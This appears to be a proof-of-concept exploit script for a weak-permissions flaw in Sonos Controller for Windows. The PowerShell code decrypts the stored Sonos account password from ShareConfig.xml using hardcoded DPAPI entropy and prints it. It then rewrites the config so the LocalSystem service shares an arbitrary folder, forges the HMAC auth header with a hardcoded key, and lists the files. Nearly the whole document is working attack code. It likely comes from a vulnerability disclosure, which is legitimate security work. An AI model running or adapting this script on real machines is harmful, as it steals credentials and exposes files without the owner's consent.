Sonos Controller for Windows ShareConfig.xml weak file permissions

SonosController.ps1

# load System.Security for HMAC-SHA256
Add-Type -AssemblyName System.Security

$ip = "127.0.0.1"
$port = 3445
$configPath = "$env:ProgramData\Sonos,_Inc\runtime\ShareConfig.xml"
$sharePath = "$env:windir\media"

# the entropy value is hardcoded in the service and used for encrypting and decrypting the password of the Sonos user (DPAPI)
$entropy = [System.Text.Encoding]::Unicode.GetBytes("e51bd1fb-2783-4261-95b8-027afc69e8af");
# the hash key is a hardcoded value used by the service to authenticated the GET/HEAD request
$hashKey = [Byte[]] (111, 228, 49, 131, 143, 228, 5, 2, 87, 208, 9, 17, 255, 208, 1, 0, 240, 228, 5, 160, 15, 229, 161, 3, 63, 209, 1, 4, 18, 210, 9, 0)

# see if we have a config file, if not create it and start the service
if(-Not (Test-Path $configPath -PathType Leaf))
{
    Write-Host "[-] $configPath doesn't exist"
    Exit
}

# read the configuration file and decrypt the password
Write-Host "[-] Trying to parse $configPath"
[xml]$shareConfig = Get-Content $configPath
$username = $shareConfig.shares.credentials.username
$password = $shareConfig.shares.credentials.password
$password = [System.Convert]::FromBase64String($password)
$password = [Security.Cryptography.ProtectedData]::Unprotect($password, $entropy, [Security.Cryptography.DataProtectionScope]::LocalMachine)
$password = [System.Text.Encoding]::Unicode.GetString($password)

Write-Host "[+] Username: $username"
Write-Host "[+] Password: $password"

foreach($share in $shareConfig.SelectNodes("//shares/*"))
{
    if(!$share.Name.Equals("credentials"))
    {
        Write-Host "[+] Share" $share.Name "["$share.Path"]"
    }
}

# the config file and parent directory has weak NTFS permissions
# we can overwrite this file and share any folder on the system (the service runs as LocalSystem)
Write-Host "[-] Backing up $configPath"
Rename-Item -Path $configPath -NewName $configPath".O"

$newUsername = "PoC"
$newPassword = [System.Text.Encoding]::Unicode.GetBytes("P@ssw0rd")
$newPassword = [Security.Cryptography.ProtectedData]::Protect($newPassword, $entropy, [Security.Cryptography.DataProtectionScope]::LocalMachine)
$newPassword = [System.Convert]::ToBase64String($newPassword)

Write-Host "[-] Creating new configuration file"
$newConfig = @"
<?xml version="1.0" encoding="utf-8"?>
<shares>
  <share name="Share" path="$sharePath" />
  <credentials>
    <username>$newUsername</username>
    <password>$newPassword</password>
  </credentials>
</shares>
"@

Set-Content -Path $configPath -Value $newConfig -Encoding UTF8

try
{
    $url = "/Share"

    # calculate the Authetication header
    $hmac = New-Object System.Security.Cryptography.HMACSHA256
    $hmac.key = $hashKey
    $auth = $hmac.ComputeHash([System.Text.Encoding]::UTF8.GetBytes("$url${newUsername}P@ssw0rd"))
    $auth = [System.BitConverter]::ToString($auth).Replace('-', '')

    # call the local webservice
    $web = New-Object Net.WebClient
    $web.Headers.Add("Authorization", "Hash $auth")
    [xml]$dirListing = $web.DownloadString("http://${ip}:$port$url")
    Write-Host "[-] Listing files from $sharePath"
    foreach($entry in $dirListing.SelectNodes("//readdir/*"))
    {
        if($entry.Name.Equals("file"))
        {
            Write-Host "[+] $($entry.'#text')"
       }
    }
}
finally
{
    # restore config
    Write-Host "[-] Restoring $configPath"
    Remove-Item -Path $configPath
    Rename-Item -Path $configPath".O" -NewName $configPath
}